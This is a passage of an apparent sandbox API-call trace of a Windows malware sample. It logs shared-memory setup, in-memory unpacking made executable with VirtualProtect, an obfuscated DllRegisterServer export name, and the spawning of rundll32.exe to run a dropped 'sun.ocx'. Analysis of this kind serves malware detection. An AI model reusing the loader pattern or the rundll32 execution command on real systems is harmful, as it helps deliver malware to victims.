dwMilliseconds=0xffffffff) returned 0x0 [0091.398] GetCurrentThreadId () returned 0xd8c [0091.398] strlen (_Str="pthr_root_shmem") returned 0xf [0091.398] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-pthr_root_shmem") returned 0x13c [0091.398] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0091.398] FindAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.398] malloc (_Size=0x4) returned 0x6db6d8 [0091.398] AddAtomA (lpString="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaAAaAAaa") returned 0xc00a [0091.398] GetAtomNameA (in: nAtom=0xc00a, lpBuffer=0x9f140, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-pthr_root_shmem-aaaaaaaaaaAAaAAaAAaAAaAAaAAaAAa") returned 0x3e [0091.398] ReleaseMutex (hMutex=0x13c) returned 1 [0091.398] CloseHandle (hObject=0x13c) returned 1 [0091.398] calloc (_Count=0x1, _Size=0xc0) returned 0x6db6e8 [0091.398] strlen (_Str="idListCnt_shmem") returned 0xf [0091.398] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListCnt_shmem") returned 0x13c [0091.399] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0091.399] FindAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.399] malloc (_Size=0x4) returned 0x6db7b0 [0091.399] AddAtomA (lpString="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaAAaAAaAAaAAaAAAAaAAaaa") returned 0xc00b [0091.399] GetAtomNameA (in: nAtom=0xc00b, lpBuffer=0x9f110, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListCnt_shmem-aaaaaaaaaaAAaAAaAAaAAaAAAAaAAaa") returned 0x3e [0091.399] ReleaseMutex (hMutex=0x13c) returned 1 [0091.399] CloseHandle (hObject=0x13c) returned 1 [0091.399] strlen (_Str="idListMax_shmem") returned 0xf [0091.399] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListMax_shmem") returned 0x13c [0091.399] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0091.399] FindAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.399] malloc (_Size=0x4) returned 0x6db7c0 [0091.399] AddAtomA (lpString="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaAAaAAaAAaAAaAAAAAaaaaa") returned 0xc00c [0091.399] GetAtomNameA (in: nAtom=0xc00c, lpBuffer=0x9f110, nSize=63 | out: lpBuffer="gcc-shmem-tdm2-idListMax_shmem-aaaaaaaaaaAAaAAaAAaAAaAAAAAaaaa") returned 0x3e [0091.399] ReleaseMutex (hMutex=0x13c) returned 1 [0091.399] CloseHandle (hObject=0x13c) returned 1 [0091.400] malloc (_Size=0x80) returned 0x6db7d0 [0091.400] strlen (_Str="idList_shmem") returned 0xc [0091.400] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idList_shmem") returned 0x13c [0091.400] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0091.400] FindAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.400] malloc (_Size=0x4) returned 0x6db858 [0091.400] AddAtomA (lpString="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaAAaAAaAAaAAAaaaaAaAAaa") returned 0xc00d [0091.400] GetAtomNameA (in: nAtom=0xc00d, lpBuffer=0x9f110, nSize=60 | out: lpBuffer="gcc-shmem-tdm2-idList_shmem-aaaaaaaaaaAAaAAaAAaAAAaaaaAaAAa") returned 0x3b [0091.400] ReleaseMutex (hMutex=0x13c) returned 1 [0091.400] CloseHandle (hObject=0x13c) returned 1 [0091.400] strlen (_Str="idListNextId_shmem") returned 0x12 [0091.400] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-idListNextId_shmem") returned 0x13c [0091.400] WaitForSingleObject (hHandle=0x13c, dwMilliseconds=0xffffffff) returned 0x0 [0091.400] FindAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.400] malloc (_Size=0x4) returned 0x6db868 [0091.400] AddAtomA (lpString="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaAAaAAaAAaAAAaaaaAAaAaa") returned 0xc00e [0091.401] GetAtomNameA (in: nAtom=0xc00e, lpBuffer=0x9f100, nSize=66 | out: lpBuffer="gcc-shmem-tdm2-idListNextId_shmem-aaaaaaaaaaAAaAAaAAaAAAaaaaAAaAa") returned 0x41 [0091.401] ReleaseMutex (hMutex=0x13c) returned 1 [0091.401] CloseHandle (hObject=0x13c) returned 1 [0091.401] GetCurrentThreadId () returned 0xd8c [0091.401] ReleaseSemaphore (in: hSemaphore=0x134, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0091.401] GetCurrentThreadId () returned 0xd8c [0091.401] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x13c [0091.401] GetCurrentProcess () returned 0xffffffff [0091.401] GetCurrentThread () returned 0xfffffffe [0091.401] GetCurrentProcess () returned 0xffffffff [0091.401] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x6db6fc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x6db6fc*=0x140) returned 1 [0091.401] GetThreadPriority (hThread=0x140) returned 0 [0091.401] strlen (_Str="fc_key") returned 0x6 [0091.401] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-fc_key") returned 0x144 [0091.401] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0091.402] FindAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.402] malloc (_Size=0x4) returned 0x6db878 [0091.402] AddAtomA (lpString="gcc-shmem-tdm2-fc_key-aaaaaaaaaaAAaAAaAAaAAAaaaaAAAAaa") returned 0xc00f [0091.402] GetAtomNameA (in: nAtom=0xc00f, lpBuffer=0x9f190, nSize=55 | out: lpBuffer="gcc-shmem-tdm2-fc_key-aaaaaaaaaaAAaAAaAAaAAAaaaaAAAAaa") returned 0x36 [0091.402] ReleaseMutex (hMutex=0x144) returned 1 [0091.402] CloseHandle (hObject=0x144) returned 1 [0091.402] strlen (_Str="_pthread_key_lock_shmem") returned 0x17 [0091.402] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_lock_shmem") returned 0x144 [0091.402] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0091.402] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.402] malloc (_Size=0x4) returned 0x6db888 [0091.402] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaAAaAAaAAaAAAaaaAaaaAaa") returned 0xc010 [0091.402] GetAtomNameA (in: nAtom=0xc010, lpBuffer=0x9f150, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_lock_shmem-aaaaaaaaaaAAaAAaAAaAAAaaaAaaaAa") returned 0x46 [0091.403] ReleaseMutex (hMutex=0x144) returned 1 [0091.403] CloseHandle (hObject=0x144) returned 1 [0091.403] strlen (_Str="_pthread_cancelling_shmem") returned 0x19 [0091.403] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_cancelling_shmem") returned 0x144 [0091.403] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0091.403] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.403] malloc (_Size=0x4) returned 0x6db898 [0091.403] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaAAaAAaAAaAAAaaaAaaAAaa") returned 0xc011 [0091.403] GetAtomNameA (in: nAtom=0xc011, lpBuffer=0x9f0f0, nSize=73 | out: lpBuffer="gcc-shmem-tdm2-_pthread_cancelling_shmem-aaaaaaaaaaAAaAAaAAaAAAaaaAaaAAa") returned 0x48 [0091.404] ReleaseMutex (hMutex=0x144) returned 1 [0091.404] CloseHandle (hObject=0x144) returned 1 [0091.404] strlen (_Str="cond_locked_shmem_rwlock") returned 0x18 [0091.404] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-cond_locked_shmem_rwlock") returned 0x144 [0091.404] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0091.404] FindAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.404] malloc (_Size=0x10) returned 0x6db8a8 [0091.404] AddAtomA (lpString="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaAAaAAaAAaAAAaaaAaAaAaa") returned 0xc012 [0091.404] GetAtomNameA (in: nAtom=0xc012, lpBuffer=0x9f0d0, nSize=72 | out: lpBuffer="gcc-shmem-tdm2-cond_locked_shmem_rwlock-aaaaaaaaaaAAaAAaAAaAAAaaaAaAaAa") returned 0x47 [0091.404] ReleaseMutex (hMutex=0x144) returned 1 [0091.404] CloseHandle (hObject=0x144) returned 1 [0091.405] calloc (_Count=0x1, _Size=0x20) returned 0x6db8c0 [0091.405] calloc (_Count=0x1, _Size=0x1c) returned 0x6db8e8 [0091.405] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x144 [0091.405] calloc (_Count=0x1, _Size=0x1c) returned 0x6db910 [0091.405] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=1, lMaximumCount=2147483647, lpName=0x0) returned 0x148 [0091.405] calloc (_Count=0x1, _Size=0x6c) returned 0x6db938 [0091.405] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x14c [0091.405] CreateSemaphoreA (lpSemaphoreAttributes=0x0, lInitialCount=0, lMaximumCount=2147483647, lpName=0x0) returned 0x150 [0091.405] strlen (_Str="rwl_global_shmem") returned 0x10 [0091.405] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-rwl_global_shmem") returned 0x154 [0091.405] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0091.405] FindAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.405] malloc (_Size=0x10) returned 0x6db9b0 [0091.405] AddAtomA (lpString="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaAAaAAaAAaAAAaaAAaAAaaa") returned 0xc013 [0091.405] GetAtomNameA (in: nAtom=0xc013, lpBuffer=0x9f0f0, nSize=64 | out: lpBuffer="gcc-shmem-tdm2-rwl_global_shmem-aaaaaaaaaaAAaAAaAAaAAAaaAAaAAaa") returned 0x3f [0091.406] ReleaseMutex (hMutex=0x154) returned 1 [0091.406] CloseHandle (hObject=0x154) returned 1 [0091.406] WaitForSingleObject (hHandle=0x144, dwMilliseconds=0xffffffff) returned 0x0 [0091.406] GetCurrentThreadId () returned 0xd8c [0091.406] WaitForSingleObject (hHandle=0x148, dwMilliseconds=0xffffffff) returned 0x0 [0091.406] GetCurrentThreadId () returned 0xd8c [0091.406] strlen (_Str="_pthread_key_sch_shmem") returned 0x16 [0091.406] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_sch_shmem") returned 0x154 [0091.406] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0091.406] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.406] malloc (_Size=0x4) returned 0x6db9c8 [0091.406] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaAAaAAaAAaAAAaaAAAaaAaa") returned 0xc014 [0091.406] GetAtomNameA (in: nAtom=0xc014, lpBuffer=0x9f150, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_sch_shmem-aaaaaaaaaaAAaAAaAAaAAAaaAAAaaAa") returned 0x45 [0091.406] ReleaseMutex (hMutex=0x154) returned 1 [0091.406] CloseHandle (hObject=0x154) returned 1 [0091.407] strlen (_Str="_pthread_key_max_shmem") returned 0x16 [0091.407] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_max_shmem") returned 0x154 [0091.407] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0091.407] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.407] malloc (_Size=0x4) returned 0x6db9d8 [0091.407] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaAAaAAaAAaAAAaaAAAaAAaa") returned 0xc015 [0091.407] GetAtomNameA (in: nAtom=0xc015, lpBuffer=0x9f150, nSize=70 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_max_shmem-aaaaaaaaaaAAaAAaAAaAAAaaAAAaAAa") returned 0x45 [0091.407] ReleaseMutex (hMutex=0x154) returned 1 [0091.407] CloseHandle (hObject=0x154) returned 1 [0091.407] strlen (_Str="_pthread_key_dest_shmem") returned 0x17 [0091.407] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName="gcc-shmem-tdm2-_pthread_key_dest_shmem") returned 0x154 [0091.407] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0091.407] FindAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa") returned 0x0 [0091.407] malloc (_Size=0x4) returned 0x6df708 [0091.409] AddAtomA (lpString="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaAAaAAaAAAAAaAAAaaaaAaa") returned 0xc016 [0091.409] GetAtomNameA (in: nAtom=0xc016, lpBuffer=0x9f150, nSize=71 | out: lpBuffer="gcc-shmem-tdm2-_pthread_key_dest_shmem-aaaaaaaaaaAAaAAaAAAAAaAAAaaaaAa") returned 0x46 [0091.409] ReleaseMutex (hMutex=0x154) returned 1 [0091.409] CloseHandle (hObject=0x154) returned 1 [0091.409] realloc (_Block=0x0, _Size=0x4) returned 0x6df730 [0091.409] ReleaseSemaphore (in: hSemaphore=0x148, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0091.409] ReleaseSemaphore (in: hSemaphore=0x144, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0091.409] ReleaseSemaphore (in: hSemaphore=0x138, lReleaseCount=1, lpPreviousCount=0x0 | out: lpPreviousCount=0x0) returned 1 [0091.409] CloseHandle (hObject=0x138) returned 1 [0091.409] free (_Block=0x6db628) [0091.409] free (_Block=0x6db5f8) [0091.409] GetLastError () returned 0x0 [0091.409] SetLastError (dwErrCode=0x0) [0091.410] GetLastError () returned 0x0 [0091.410] realloc (_Block=0x0, _Size=0x4) returned 0x6df740 [0091.410] realloc (_Block=0x0, _Size=0x1) returned 0x6df750 [0091.410] SetLastError (dwErrCode=0x0) [0091.410] GetNativeSystemInfo (in: lpSystemInfo=0x9f2f8 | out: lpSystemInfo=0x9f2f8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0091.410] VirtualAlloc (lpAddress=0x10000000, dwSize=0x27000, flAllocationType=0x3000, flProtect=0x4) returned 0x10000000 [0091.410] GetProcessHeap () returned 0x4c0000 [0091.410] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x34) returned 0x53add0 [0091.410] VirtualAlloc (lpAddress=0x10000000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10000000 [0091.411] VirtualAlloc (lpAddress=0x10001000, dwSize=0x22400, flAllocationType=0x1000, flProtect=0x4) returned 0x10001000 [0091.414] VirtualAlloc (lpAddress=0x10024000, dwSize=0x200, flAllocationType=0x1000, flProtect=0x4) returned 0x10024000 [0091.414] VirtualAlloc (lpAddress=0x10025000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10025000 [0091.414] VirtualAlloc (lpAddress=0x10026000, dwSize=0x400, flAllocationType=0x1000, flProtect=0x4) returned 0x10026000 [0091.415] GetLastError () returned 0x0 [0091.415] SetLastError (dwErrCode=0x0) [0091.415] GetLastError () returned 0x0 [0091.415] SetLastError (dwErrCode=0x0) [0091.415] GetLastError () returned 0x0 [0091.415] SetLastError (dwErrCode=0x0) [0091.415] GetLastError () returned 0x0 [0091.415] SetLastError (dwErrCode=0x0) [0091.415] VirtualProtect (in: lpAddress=0x10001000, dwSize=0x22400, flNewProtect=0x20, lpflOldProtect=0x9f1d0 | out: lpflOldProtect=0x9f1d0*=0x4) returned 1 [0091.431] GetLastError () returned 0x0 [0091.431] SetLastError (dwErrCode=0x0) [0091.431] GetLastError () returned 0x0 [0091.431] SetLastError (dwErrCode=0x0) [0091.431] GetLastError () returned 0x0 [0091.431] SetLastError (dwErrCode=0x0) [0091.431] VirtualProtect (in: lpAddress=0x10024000, dwSize=0x200, flNewProtect=0x2, lpflOldProtect=0x9f1d0 | out: lpflOldProtect=0x9f1d0*=0x4) returned 1 [0091.431] GetLastError () returned 0x0 [0091.431] SetLastError (dwErrCode=0x0) [0091.431] GetLastError () returned 0x0 [0091.431] SetLastError (dwErrCode=0x0) [0091.432] GetLastError () returned 0x0 [0091.432] SetLastError (dwErrCode=0x0) [0091.432] VirtualProtect (in: lpAddress=0x10025000, dwSize=0x400, flNewProtect=0x4, lpflOldProtect=0x9f1d0 | out: lpflOldProtect=0x9f1d0*=0x4) returned 1 [0091.432] GetLastError () returned 0x0 [0091.432] SetLastError (dwErrCode=0x0) [0091.432] GetLastError () returned 0x0 [0091.432] SetLastError (dwErrCode=0x0) [0091.432] GetLastError () returned 0x0 [0091.432] SetLastError (dwErrCode=0x0) [0091.432] VirtualFree (lpAddress=0x10026000, dwSize=0x400, dwFreeType=0x4000) returned 1 [0091.436] GetLastError () returned 0x0 [0091.436] SetLastError (dwErrCode=0x0) [0091.436] GetLastError () returned 0x0 [0091.436] SetLastError (dwErrCode=0x0) [0091.437] GetCommandLineW () returned="C:\\Windows\\SysWow64\\rundll32.exe ..\\sun.ocx,D\"&\"l\"&\"lR\"&\"egister\"&\"Serve\"&\"r" [0091.437] GetProcessHeap () returned 0x4c0000 [0091.437] GetModuleHandleA (lpModuleName="NTDLL") returned 0x779e0000 [0091.438] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x28) returned 0x542830 [0091.438] lstrcmpiW (lpString1="D\"&\"l\"&\"lR\"&\"egister\"&\"Serve\"&\"r", lpString2="DllRegisterServer") returned -1 [0091.439] GetProcessHeap () returned 0x4c0000 [0091.440] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x542830 | out: hHeap=0x4c0000) returned 1 [0091.440] SHGetFolderPathW (in: hwnd=0x0, csidl=41, hToken=0x0, dwFlags=0x0, pszPath=0x9f07c | out: pszPath="C:\\Windows\\SysWOW64") returned 0x0 [0091.447] GetModuleFileNameW (in: hModule=0x6ab00000, lpFilename=0x9ee74, nSize=0x104 | out: lpFilename="C:\\Users\\kEecfMwgj\\sun.ocx" (normalized: "c:\\users\\keecfmwgj\\sun.ocx")) returned 0x1a [0091.447] GetProcessHeap () returned 0x4c0000 [0091.447] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x8, Size=0x50) returned 0x51f000 [0091.448] _snwprintf (in: _Dest=0x4c1ae2, _Count=0x104, _Format="%s\\rundll32.exe \"%s\",DllRegisterServer" | out: _Dest="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\sun.ocx\",DllRegisterServer") returned 79 [0091.448] GetProcessHeap () returned 0x4c0000 [0091.448] HeapFree (in: hHeap=0x4c0000, dwFlags=0x0, lpMem=0x51f000 | out: hHeap=0x4c0000) returned 1 [0091.448] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\sun.ocx\",DllRegisterServer", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x9eaec*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x9eb30 | out: lpCommandLine="C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\sun.ocx\",DllRegisterServer", lpProcessInformation=0x9eb30*(hProcess=0x158, hThread=0x154, dwProcessId=0xd98, dwThreadId=0xd9c)) returned 1 [0091.533] CloseHandle (hObject=0x158) returned 1 [0091.533] CloseHandle (hObject=0x154) returned 1 [0091.533] ExitProcess (uExitCode=0x0) Process: id = "3" image_name = "rundll32.exe" filename = "c:\\windows\\syswow64\\rundll32.exe" page_root = "0x32c0d000" os_pid = "0xd98" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0xd88" cmd_line = "C:\\Windows\\SysWOW64\\rundll32.exe \"C:\\Users\\kEecfMwgj\\sun.ocx\",DllRegisterServer" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1052 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1053 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1054 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1055 start_va = 0x80000 end_va = 0xbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 1056 start_va = 0xf0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf178c region_type = mapped_file name = "rundll32.exe" filename = "\\Windows\\SysWOW64\\rundll32.exe" (normalized: "c:\\windows\\syswow64\\rundll32.exe") Region: id = 1057 start_va = 0x230000 end_va = 0x26ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000230000" filename = "" Region: id = 1058 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1059 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1060 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1061 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1062 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1063 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1064 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1065 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1066 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1068 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 1069 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 1070 start_va = 0x70000 end_va = 0x71fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 1071 start_va = 0x100000 end_va = 0x100fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1072 start_va = 0x350000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 1073 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1074 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1075 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1076 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1077 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1078 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1079 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 1080 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1081 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 1082 start_va = 0x3d0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 1083 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id 